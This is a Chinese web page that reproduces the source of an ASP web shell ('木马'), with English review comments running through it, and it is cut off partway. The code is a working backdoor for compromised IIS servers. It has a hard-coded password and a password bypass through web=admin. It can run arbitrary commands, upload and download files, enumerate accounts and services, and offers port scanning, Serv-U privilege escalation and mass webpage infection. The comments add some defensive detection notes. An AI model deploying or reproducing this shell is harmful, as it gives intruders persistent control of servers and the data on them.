一款不错的asp木马 黑色界面
2023-11-07 11:36:40
<%
' Script-wide settings for this ASP web-shell listing.
' NOTE(review): the page shows the code lower-cased and hard-wrapped (string
' literals are split across lines further down), so read it as an analysis
' copy rather than as runnable source.
' The script timeout is set very high, the response is buffered, and
' "on error resume next" silences every later runtime error unless the code
' inspects err itself.
server.scripttimeout=999999999
response.buffer =true
on error resume next
userpass="643617" 'password (hard-coded, plaintext; the login check compares the posted value against it)
mname="by:.尐飛" 'backdoor name
copyright="注:请勿用于非法用途,否则后果作者概不负责" 'copyright
' The three statements below repeat the settings above verbatim.
server.scripttimeout=999999999
response.buffer =true
on error resume next
' Prints the pending error's description as a "history.back()" link, then
' clears the error and flushes the response. Does nothing when err is not set.
' err.description is written through rrs without any HTML encoding.
sub showerr()
if err then
rrs"<br><a href='javascript:history.back()'><br> " &
err.description & "</a><br>"
err.clear:response.flush
end if
end sub
' Thin wrapper around response.write. The HTML fragments in this listing are
' emitted through it; no encoding of str is applied here.
sub rrs(str)
response.write(str)
end sub
' Doubles every backslash in s. The listing uses it when a Windows path is
' placed inside a javascript string literal (e.g. the showfolder(...) links).
function repath(s)
repath=replace(s,"\","\\")
end function
' Inverse of repath: collapses each doubled backslash in s to a single one.
' Applied to the folderpath request value before it is stored in the session.
function rrepath(s)
rrepath=replace(s,"\\","\")
end function
' Request and environment values captured once for the rest of the script.
' url / serverip / serveru come from server variables; rootpath and wwwroot
' are the physical paths of the script's directory and of the site root.
' action, folderpath and fname are read with request(...) and are used later
' as the operation selector and as file-system paths; no validation of them
' is visible at this point.
url=request.servervariables("url")
serverip=request.servervariables("local_addr")
action=request("action")
rootpath=server.mappath(".")
wwwroot=server.mappath("/")
serveru=request.servervariables("http_host")&url
' serverp is a second copy of the hard-coded password.
serverp=userpass
folderpath=request("folderpath")
fname=request("fname")
' backurl is the "go back" link appended to result messages.
backurl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
rrs"<html><meta http-equiv=""content-type"" content=""text/html;
charset=gb2312"">"
rrs"<title>"&mname1&" - "&serverip&" </title>"
rrs"<style type=""text/css"">"
rrs"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
rrs"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
rrs".c{background-color:#000000;border:0px}"
rrs".cmd{background-color:#000;color:#fff}"
rrs"body{margin: 0px;margin-left:4px;}"
rrs"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
rrs".am{color:#888;font-size:11px;}"
rrs"</style>"
rrs"<script language=javascript>function killerrors(){return true;}
window.onerror=killerrors;"
rrs"function yesok(){if (confirm(""确认要执行此操作吗?""))return
true;else return false;}"
rrs"function runclock(){thetime = window.settimeout(""runclock()"",
100);var today = new date();var display= today.tolocalestring
();window.status=""→"&ad&" --""+display;}runclock();"
rrs"function showfolder(folder){top.addrform.folderpath.value =
folder;top.addrform.submit();}"
rrs"function fullform(fname,faction){top.hideform.fname.value =
fname;if(faction==""copyfile""){dname = prompt(""请输入复制到目标文件全
名称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefile""){dname = prompt(""请输入移动到目标文件全名
称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""copyfolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""newfolder""){dname = prompt(""请输入要新建的文件夹全名
称"",fname);top.hideform.fname.value = dname;}else{dname = ""other"";}
if(dname!=null){top.hideform.action.value =
faction;top.hideform.submit();}else{top.hideform.fname.value = """";}}"
rrs"</script>"
rrs "<body"
if action="" then rrs " scroll=no"
rrs ">"
' Capability probe. obt is a 14-row table:
'   obt(i,0) = COM ProgID, obt(i,2) = description, obt(i,1) = availability mark
' filled in by the loop at the end of this run.
' The ProgIDs cover file access, command execution (wscript.shell), Access/Jet
' database helpers, ADO streams and connections, several third-party upload
' components, mail components and microsoft.xmlhttp.
' Later code instantiates objects through obt(n,0) instead of a literal ProgID,
' so a plain string search for e.g. createobject("wscript.shell") will not
' match every call site in this file.
' For defenders: a single request that instantiates this many unrelated
' components is unusual for an ordinary page, and unregistering or restricting
' components the site does not need reduces what such a script can reach.
dim obt(13,2)
obt(0,0) = "scripting.filesystemobject"
obt(0,2) = "文件操作组件"
obt(1,0) = "wscript.shell"
obt(1,2) = "命令行执行组件"
obt(2,0) = "adox.catalog"
obt(2,2) = "access建库组件"
obt(3,0) = "jro.jetengine"
obt(3,2) = "access压缩组件"
obt(4,0) = "scripting.dictionary"
obt(4,2) = "数据流上传辅助组件"
obt(5,0) = "adodb.connection"
obt(5,2) = "数据库连接组件"
obt(6,0) = "adodb.stream"
obt(6,2) = "数据流上传组件"
obt(7,0) = "softartisans.fileup"
obt(7,2) = "sa-fileup 文件上传组件"
obt(8,0) = "lyfupload.uploadfile"
obt(8,2) = "刘云峰文件上传组件"
obt(9,0) = "persits.upload.1"
obt(9,2) = "aspupload 文件上传组件"
obt(10,0) = "jmail.smtpmail"
obt(10,2) = "jmail 邮件收发组件"
obt(11,0) = "cdonts.newmail"
obt(11,2) = "虚拟smtp发信组件"
obt(12,0) = "smtpmail.smtpmail.1"
obt(12,2) = "smtpmail发信组件"
obt(13,0) = "microsoft.xmlhttp"
obt(13,2) = "数据传输组件"
' Try to create each component. Error -2147221005 (0x800401F3, "invalid class
' string") is treated as "not installed"; any other outcome is marked available.
for i=0 to 13
set t=server.createobject(obt(i,0))
if -2147221005 <> err then
isobj=" √"
else
isobj=" ×"
err.clear
end if
set t=nothing
obt(i,1)=isobj
next
' Tracks the "current folder" in the session: a folderpath supplied in the
' request replaces it (after rrepath), and an empty session value falls back
' to the script's own directory. The request value is stored as given.
if folderpath<>"" then
session("folderpath")=rrepath(folderpath)
end if
if session("folderpath")="" then
folderpath=rootpath
session("folderpath")=folderpath
end if
' Emits the main layout: a hidden form "hideform" (fields action and fname)
' that the client-side fullform() script fills in for file operations, an
' address-bar form that posts folderpath, and two iframes that load
' ?action=mainmenu and ?action=show1file.
' session("folderpath") is written into a value attribute without encoding.
function mainform()
rrs"<form name=""hideform"" method=""post"" action="""&url&"""
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"'
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='fileframe.location.reload()'>"
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%'
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
' NOTE(review): this branch marks the session as logged in whenever the
' request carries web=admin; no password is compared. The session key it sets
' ("web2a2dmin") is the same one the login gate later checks against userpass,
' so this is a second, unauthenticated way into the shell. When this file is
' found on a server, web logs should be searched for this parameter as well as
' for the login form posts, since more than one party may have used it.
' url is a string variable assigned earlier, so "url()" is presumably an error
' that "on error resume next" swallows (confirm).
if request("web")="admin" then
session("web2a2dmin") = userpass
url()
end if
' Second definition of mainform; line for line the same as the definition
' that appears earlier in this listing (hidden "hideform", address-bar form
' posting folderpath, and the mainmenu / show1file iframes).
function mainform()
rrs"<form name=""hideform"" method=""post"" action="""&url&"""
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"'
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='fileframe.location.reload()'>"
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%'
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
' Renders the left-hand menu frame: drive and well-known folder shortcuts,
' followed by one link per feature of the shell.
' The folder shortcuts are printed only when the filesystemobject probe
' (obt(0,1)) succeeded; otherwise a "no permission" row is shown.
' For defenders: the ?action= values emitted below (course, getterminalinfo,
' serverinfo, cmd1shell, scanport, servu, readreg, editfile, upfile, kmuma,
' cplgm with m=1..3, plgm, logout) are sent as query-string parameters, so
' they are searchable in web-server access logs when scoping what was done
' through this file.
' siteurl2, mname2 and copyright2 are not assigned anywhere in the visible
' listing.
' NOTE(review): near the end the listing reads "©right2" where "&copyright2"
' was presumably written; the page seems to have decoded "&copy" as an HTML
' entity.
function mainmenu()
rrs"<table width='100%' cellspacing='0' cellpadding='0'>"
rrs"<tr><td height='5'></td></tr>"
rrs"<tr><td><center><a href='"&siteurl2&"' target='_blank'><font
color=red>"&mname2&"</font></center></a><hr hight=1 width='100%'>"
rrs"</td></tr>"
if obt(0,1)=" ×" then
rrs"<tr><td height='24'>无权限</td></tr>"
else
rrs"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盘<div id=menu1 style=""width:100%;display='none'""
onmouseout=""menu1.style.display='none'"">"
set abc=new lbf:rrs abc.showdriver():set abc=nothing
rrs"</div></td></tr><tr><td height='20'><a href='javascript:showfolder
("""&repath(wwwroot)&""")'>->站点根目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder("""&repath
(rootpath)&""")'>→本程序目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\program
files"")'>→program files</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\documents"")'>->documents</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\application data\\symantec\\pcanywhere"")'>-
>pcanywhere</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序
<hr></a></td></tr>"
end if
rrs"<tr><td height='22'><a href='?action=course' target='fileframe'>→
系统服务-用户账号</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=getterminalinfo'
target='fileframe'>→终端端口-自动登录</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=serverinfo'
target='fileframe'>→服务信息-组件支持</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cmd1shell' target='fileframe'>
→执行cmd命令</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=scanport' target='fileframe'>
→端口扫描器</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=servu' target='fileframe'>→
serv-u提权</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=readreg' target='fileframe'>→
读取注册表</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:fullform("""&repath
(session("folderpath")&"\newfolder")&""",""newfolder"")'>→新建目录
<hr></a></td></tr>"
rrs"<tr><td height='20'><a href='?action=editfile' target='fileframe'>
→新建文本</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=upfile' target='fileframe'>→
上传文件</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=kmuma' target='fileframe'>→查
找木马</b></a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=1' target='fileframe'>
→高级挂马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=2' target='fileframe'>
→批量清马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=3' target='fileframe'>
→批量替换</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=plgm' target='fileframe'></b>
→低级挂马</a></b></td></tr>"
rrs"<tr><td height='22'><a href='?action=logout' target='_top'>→退出登
录</a></td></tr>"
rrs"<tr><td align=center
style='color:red'><hr>"©right2&"</td></tr></table>"
rrs"</table>"
end function
' Unpacks files stored in an Access (Jet) database located at thepath.
' It opens the "filedata" table and, for every row, writes the binary
' "filecontent" column to the relative path held in the row's "thepath"
' column, under the script's own directory. Missing folders are created and
' existing files are overwritten (savetofile mode 2).
' The row path is appended to the base directory without any check, so where
' files land is decided entirely by the database contents.
' fsox is not defined in the visible listing; ws is declared and released but
' never assigned. Errors are suppressed by "on error resume next".
sub unpack(thepath)
on error resume next
server.scripttimeout = 5000
dim rs, ws, str, conn, stream, connstr, thefolder
str = server.mappath(".") & "\"
set rs = createobject("adodb.recordset")
set stream = createobject("adodb.stream")
set conn = createobject("adodb.connection")
connstr = "provider=microsoft.jet.oledb.4.0;data
source=" & thepath & ";"
conn.open connstr
rs.open "filedata", conn, 1, 1
stream.open
stream.type = 1
do until rs.eof
thefolder = left(rs("thepath"), instrrev(rs
("thepath"), "\"))
if fsox.folderexists(str & thefolder) = false
then
createfolder(str & thefolder)
end if
stream.seteos()
stream.write rs("filecontent")
stream.savetofile str & rs("thepath"), 2
rs.movenext
loop
rs.close
conn.close
stream.close
set ws = nothing
set rs = nothing
set stream = nothing
set conn = nothing
end sub
' Creates every missing folder along thepath, walking it one backslash at a
' time. At each separator it tests the prefix including the backslash and
' creates the prefix without it. A final component that is not followed by a
' backslash is not created by this loop.
' fsox is not defined in the visible listing.
sub createfolder(thepath)
dim i
i = instr(thepath, "\")
do while i > 0
if fsox.folderexists(left(thepath, i)) = false
then
fsox.createfolder(left(thepath, i - 1))
end if
if instr(mid(thepath, i + 1), "\") then
i = i + instr(mid(thepath, i + 1), "\")
else
i = 0
end if
loop
end sub
' Builds and prints a table of the objects returned by getobject("winnt://.")
' (the local machine, through the WinNT directory provider).
' Entries whose starttype compares equal to "" are listed as "system user
' (group)"; the remaining entries are treated as services and shown with name,
' display name, start type (2 = automatic, 3 = manual, 4 = disabled) and
' binary path.
' Automatic services whose path characters 4-6 are not "win" are collected in
' si1 and rendered in red; all others go to si2 in blue.
' For defenders: this is host reconnaissance (local accounts, services and
' their binary paths) performed from the web application's identity.
' NOTE(review): with "on error resume next" active, how the starttype tests
' behave for objects that lack that property is not evident from the listing.
function course()
si="<br><table width='600' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
统用户与服务</td></tr>"
on error resume next
for each obj in getobject("winnt://.")
err.clear
if obj.starttype="" then
si=si&"<tr>"
si=si&"<td height=""20"" bgcolor=""#ffffff""> "
si=si&obj.name
si=si&"</td><td bgcolor=""#ffffff""> "
si=si&"系统用户(组)"
si=si&"</td></tr>"
si0="<tr><td height=""20"" bgcolor=""#ffffff""
colspan=""2""> </td></tr>"
end if
if obj.starttype=2 then lx="自动"
if obj.starttype=3 then lx="手动"
if obj.starttype=4 then lx="禁用"
if lcase(mid(obj.path,4,3))<>"win" and obj.starttype=2 then
si1=si1&"<tr><td height=""20""
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20""
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20""
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font
color=#ff0000> "&obj.path&"</font></td></tr>"
else
si2=si2&"<tr><td height=""20""
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20""
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20""
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font
color=#3399ff> "&obj.path&"</font></td></tr>"
end if
next
rrs si&si0&si1&si2&"</table>"
end function
function serverinfo()
si="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
务器组件信息</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器名</td><td bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("server_name")&"</td></tr>"
si=si&"<form method=post action='http://www.ip138.com/index.asp'
name='ipform' target='_blank'><tr align='center'><td height='20'
width='200' bgcolor='#ffffff'>服务器ip</td><td
bgcolor='#ffffff'> </td><td bgcolor='#ffffff'>"
si=si&"<input type='text' name='ip' size='15'
value='"&request.servervariables("local_addr")
&"'style='border:0px'><input type='submit' value='查
询'style='border:0px'><input type='hidden' name='action'
value='2'></td></tr></form>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器时间</td><td bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&now&" </td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器cpu数量</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("number_of_processors")
&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器操作系统</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("os")&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>web服务器版本</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("server_software")
&"</td></tr>"
for i=0 to 13
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>"&obt(i,0)&"</td><td bgcolor='#ffffff'>"&obt(i,1)
&"</td><td bgcolor='#ffffff' align=left>"&obt(i,2)&"</td></tr>"
next
rrs si
end function
' Sends the file at path to the client as a download.
' The file is loaded in binary mode through the component named in obt(6,0)
' (adodb.stream in the table built earlier), the download name is the text
' after the last backslash of path, and the whole content is written with
' response.binarywrite.
' path is used as given; nothing here restricts it to the web root.
function downfile(path)
response.clear
set osm = createobject(obt(6,0))
osm.open
osm.type = 1
osm.loadfromfile path
sz=instrrev(path,"\")+1
response.addheader "content-disposition", "attachment; filename=" &
mid(path,sz)
response.addheader "content-length", osm.size
response.charset = "utf-8"
response.contenttype = "application/octet-stream"
response.binarywrite osm.read
response.flush
osm.close
set osm = nothing
end function
' Intended to escape HTML metacharacters in s and return the result; returns
' nothing (empty) when s is null.
' NOTE(review): as shown on the page, each replace maps a character to itself,
' and the chr(34) line has an unbalanced string literal. The original
' presumably used entity names that the page decoded while rendering, so the
' listing as displayed performs no escaping.
function htmlencode(s)
if not isnull(s) then
s = replace(s, ">", ">")
s = replace(s, "<", "<")
s = replace(s, chr(39), "'")
s = replace(s, chr(34), """)
s = replace(s, chr(20), " ")
htmlencode = s
end if
end function
' File upload handler.
' With action2=post it parses the multipart body through the upc class, takes
' the uploaded part named "localfile" and saves it to the full path given in
' the "topath" form field, then prints a result message and ends the response.
' Without action2=post it renders the upload form, pre-filled with the current
' session folder plus "\diy3.asp".
' The destination path and file name are chosen entirely by the client.
' For defenders: multipart POSTs to a URL carrying action=upfile&action2=post,
' and script files newly created by the web application's identity, are the
' traces this handler leaves.
function upfile()
if request("action2")="post" then
set u=new upc : set f=u.ua("localfile")
uname=u.form("topath")
if uname="" or f.filesize=0 then
si="<br>请输入上传的完全路径后选择一个文件上传!"
else
f.saveas uname
if err.number=0 then
si="<center><br><br><br>文件"&uname&"上传成功!</center>"
end if
end if
set f=nothing:set u=nothing
si=si&backurl
rrs si
showerr()
response.end
end if
si="<br><br><br><table border='0' cellpadding='0' cellspacing='0'
align='center'>"
si=si&"<form name='upform' method='post' action='"&url&"?
action=upfile&action2=post' enctype='multipart/form-data'>"
si=si&"<tr><td>"
si=si&"上传路径:<input name='topath' value='"&rrepath(session
("folderpath")&"\diy3.asp")&"' size='40'>"
si=si&" <input name='localfile' type='file' size='25'>"
si=si&" <input type='submit' name='submit' value='上传'>"
si=si&"</td></tr></form></table>"
rrs si
end function
' Command-execution page.
' It renders a form with three inputs: sp (program path, remembered in
' session("shellpath"), default "diy3.asp" as shown), a wscript checkbox and
' cmd. When cmd is posted, the string sp & " /c " & cmd is run in one of two
' ways:
'   - checkbox set: through the component in obt(1,0) (wscript.shell in the
'     table built earlier) with exec, and stdout is appended to the page as is;
'   - otherwise: through wscript.shell run with output redirected to cmd.txt
'     in the script's directory, which is then read back, HTML-encoded and
'     deleted.
' Request values are concatenated into the command line and into the form's
' value attributes without any filtering.
' For defenders: the observable behaviour is the web server's worker process
' starting child processes, and a short-lived cmd.txt appearing in a web
' directory; both are good candidates for process-creation and file-creation
' alerting on web servers.
' The wscript.shell object is created twice in a row in the second branch.
function cmd1shell()
checked=" checked"
if request("sp")<>"" then session("shellpath") = request("sp")
shellpath=session("shellpath")
if shellpath="" then shellpath = "diy3.asp"
if request("wscript")<>"yes" then checked=""
if request("cmd")<>"" then defcmd = request("cmd")
si="<form method='post'>"
si=si&"shell路径:<input name='sp' value='"&shellpath&"'
style='width:70%'> "
si=si&"<input class=c type='checkbox' name='wscript'
value='yes'"&checked&">wscript.shell"
si=si&"<input name='cmd' style='width:92%' value='"&defcmd&"'> <input
type='submit' value='执行'><textarea style='width:100%;height:440;'
class='cmd'>"
if request.form("cmd")<>"" then
if request.form("wscript")="yes" then
set cm=createobject(obt(1,0))
set dd=cm.exec(shellpath&" /c "&defcmd)
aaa=dd.stdout.readall
si=si&aaa
else
on error resume next
set ws=server.createobject("wscript.shell")
set ws=server.createobject("wscript.shell")
set fso=server.createobject("scripting.filesystemobject")
sztempfile = server.mappath("cmd.txt")
call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
set fs = createobject("scripting.filesystemobject")
set ofilelcx = fs.opentextfile (sztempfile, 1, false, 0)
aaa=server.htmlencode(ofilelcx.readall)
ofilelcx.close
call fso.deletefile(sztempfile, true)
si=si&aaa
end if
end if
si=si&chr(13)&"</textarea></form>"
rrs si
end function
' Login gate. Everything after this point runs only when
' session("web2a2dmin") equals the hard-coded userpass.
'   - A posted "pass" equal to userpass sets the session value and redirects
'     back to the script.
'   - A wrong "pass" prints a banner.
'   - No "pass" builds the login form; it is printed when instr(si,sic) is
'     non-zero (sic is not assigned anywhere in the visible listing).
' In every unauthenticated case the response ends here.
' The comparison is a plain string equality against a plaintext constant, and
' no attempt counter or delay is visible.
' For defenders: POSTs with a single "pass" field to an otherwise unknown .asp
' file are the login trace of this shell.
' siteurl is not assigned in the visible listing; "©right" is presumably
' "&copyright" with "&copy" decoded by the page.
if session("web2a2dmin")<>userpass then
if request.form("pass")<>"" then
if request.form("pass")=userpass then
session("web2a2dmin")=userpass
response.redirect url
else
rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div
align=center><font size='14' color='lime'>hack by:漫步云端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid
#222;padding:22px;margin:100px;'><br><a href='"&siteurl&"'
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密码:<input name='pass' type='password' size='22'> <input
type='submit' value='登录'><hr>"©right&"</center>"
if instr(si,sic)<>0 then rrs si
end if
response.end
end if
dim t1
' Hand-written multipart/form-data parser used by the upload handler, so the
' script does not depend on any third-party upload component.
'   d1 : dictionary of text fields  (lower-cased name -> value)
'   d2 : dictionary of file parts   (lower-cased name -> fif object)
' class_initialize reads the entire request body into the script-level stream
' t1 in one call (request.binaryread(request.totalbytes)), takes the first
' line as the part boundary and walks the parts. For a part whose header
' contains filename=", only the byte offset and length inside t1 are recorded
' in a fif object; for other parts the body is decoded as gb2312 text and
' stored in d1 (repeated names are joined with ", ").
' form(f) returns a text field or ""; ua(f) returns the file object or a new
' empty fif. class_terminate clears both dictionaries and closes t1 when the
' request had a body.
' The header offsets are found with fixed start positions (22 and 45), and the
' client-supplied file name and content type are located but not stored.
class upc
dim d1,d2
public function form(f)
f=lcase(f)
if d1.exists(f) then:form=d1(f):else:form="":end if
end function
public function ua(f)
f=lcase(f)
if d2.exists(f) then:set ua=d2(f):else:set ua=new fif:end if
end function
private sub class_initialize
dim
tda,tst,vbcrlf,tin,diend,t2,tlen,tfl,sfv,fstart,fend,dstart,dend,upname
set d1=createobject(obt(4,0))
if request.totalbytes<1 then exit sub
set t1 = createobject(obt(6,0))
t1.type = 1 : t1.mode =3 : t1.open
t1.write request.binaryread(request.totalbytes)
t1.position=0 : tda =t1.read : dstart = 1
dend = lenb(tda)
set d2=createobject(obt(4,0))
vbcrlf = chrb(13) & chrb(10)
set t2 = createobject(obt(6,0))
tst = midb(tda,1, instrb(dstart,tda,vbcrlf)-1)
tlen = lenb (tst)
dstart=dstart+tlen+1
while (dstart + 10) < dend
diend = instrb(dstart,tda,vbcrlf & vbcrlf)+3
t2.type = 1 : t2.mode =3 : t2.open
t1.position = dstart
t1.copyto t2,diend-dstart
t2.position = 0 : t2.type = 2 : t2.charset ="gb2312"
tin = t2.readtext : t2.close
dstart = instrb(diend,tda,tst)
fstart = instr(22,tin,"name=""",1)+6
fend = instr(fstart,tin,"""",1)
upname = lcase(mid (tin,fstart,fend-fstart))
if instr (45,tin,"filename=""",1) > 0 then
set tfl=new fif
fstart = instr(fend,tin,"filename=""",1)+10
fend = instr(fstart,tin,"""",1)
fstart = instr(fend,tin,"content-type: ",1)+14
fend = instr(fstart,tin,vbcr)
tfl.filestart =diend
tfl.filesize = dstart -diend -3
if not d2.exists(upname) then
d2.add upname,tfl
end if
else
t2.type =1 : t2.mode =3 : t2.open
t1.position = diend : t1.copyto t2,dstart-diend-3
t2.position = 0 : t2.type = 2
t2.charset ="gb2312"
sfv = t2.readtext
t2.close
if d1.exists(upname) then
d1(upname)=d1(upname)&", "&sfv
else
d1.add upname,sfv
end if
end if
dstart=dstart+tlen+1
wend
tda=""
set t2 =nothing
end sub
private sub class_terminate
if request.totalbytes>0 then
d1.removeall:d2.removeall
set d1=nothing:set d2=nothing
t1.close:set t1 =nothing
end if
end sub
end class
' Describes one uploaded file as a slice (filestart, filesize) of the
' script-level request stream t1; both fields start at 0.
' saveas(f) copies that slice into a new binary stream and saves it to path f,
' overwriting an existing file (savetofile mode 2).
' Return value: true when nothing was saved (empty f or filestart = 0), false
' after a save, i.e. the opposite of what the name suggests.
' f is used as given; no extension or directory check is applied.
class fif
dim filesize,filestart
private sub class_initialize
filesize = 0
filestart= 0
end sub
public function saveas(f)
dim t3
saveas=true
if trim(f)="" or filestart=0 then exit function
set t3=createobject(obt(6,0))
t3.mode=3 : t3.type=1 : t3.open
t1.position=filestart
t1.copyto t3,filesize
t3.savetofile f,2
t3.close
set t3=nothing
saveas=false
end function
end class
class lbf
dim cf
private sub class_initialize
set cf=createobject(obt(0,0))
end sub
private sub class_terminate
set cf=nothing
end sub
function showdriver()
for each d in cf.drives
rrs" <a href='javascript:showfolder
("""&d.driveletter&":\\"")'>本地磁盘 ("&d.driveletter&":)</a><br>"
next
end function
function show1file(path)
set fold=cf.getfolder(path)
i=0
si="<table width='100%' border='0' cellspacing='0'
cellpadding='0'><tr>"
for each f in fold.subfolders
si=si&"<td height=10>"
si=si&"<a href='javascript:showfolder("""&repath(path&"\"&f.name)
&""")' title=""打开""><font face='wingdings'
size='6'>0</font>"&f.name&"</a>"
si=si&" _<a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""copyfolder"")' onclick='return yesok()'
class='am' title='复制'>复制</a>"
si=si&" <a href='javascript:fullform("""&replace
(path&"\"&f.name,"\","\\")&""",""delfolder"")' onclick='return yesok
()' class='am' title='删除'>删除</a>"
si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""movefolder"")' onclick='return yesok()'
class='am' title='移动'>移动</a>"
si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""downfile"")' onclick='return yesok()'
class='am' title='下载'>下载</a></td>"
i=i+1
if i mod 3 = 0 then si=si&"</tr><tr>"
next
si=si&"</tr><tr><td height=2></td></tr></table>"
rrs si &"<hr noshade color=""#cccccc"" size=1 color=""#"" />" :
si=""
for each l in fold.files
si="<table width='100%' border='0' cellspacing='0'
cellpadding='0'>"
si=si&"<tr style='boungroup-color:#'>"
si=si&"<td height='30'><a href='javascript:fullform("""&repath
(path&"\"&l.name)&""",""downfile"");' title='下载'><font
face='wingdings' size='4'>2</font>"&l.name&"</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""editfile"")' class='am' title='编辑'>编辑</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""copyfile"")' class='am' title='复制'>复制</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""movefile"")' class='am' title='移动'>移动</a></td>"
si=si&"<td width='50' align=""center"">"&clng(l.size/1024)&"k</td>"
si=si&"<td width='200' align=""center"">"&l.type&"</td>"
si=si&"<td width='160'>"&l.datelastmodified&"</td>"
si=si&"</tr></table>"
rrs si:si=""
next
set fold=nothing
end function
function delfile(path)
if cf.fileexists(path) then
cf.deletefile path
si="<center><br><br><br>文件 "&path&" 删除成功!</center>"
si=si&backurl
rrs si
end if
end function
function editfile(path)
if request("action2")="post" then
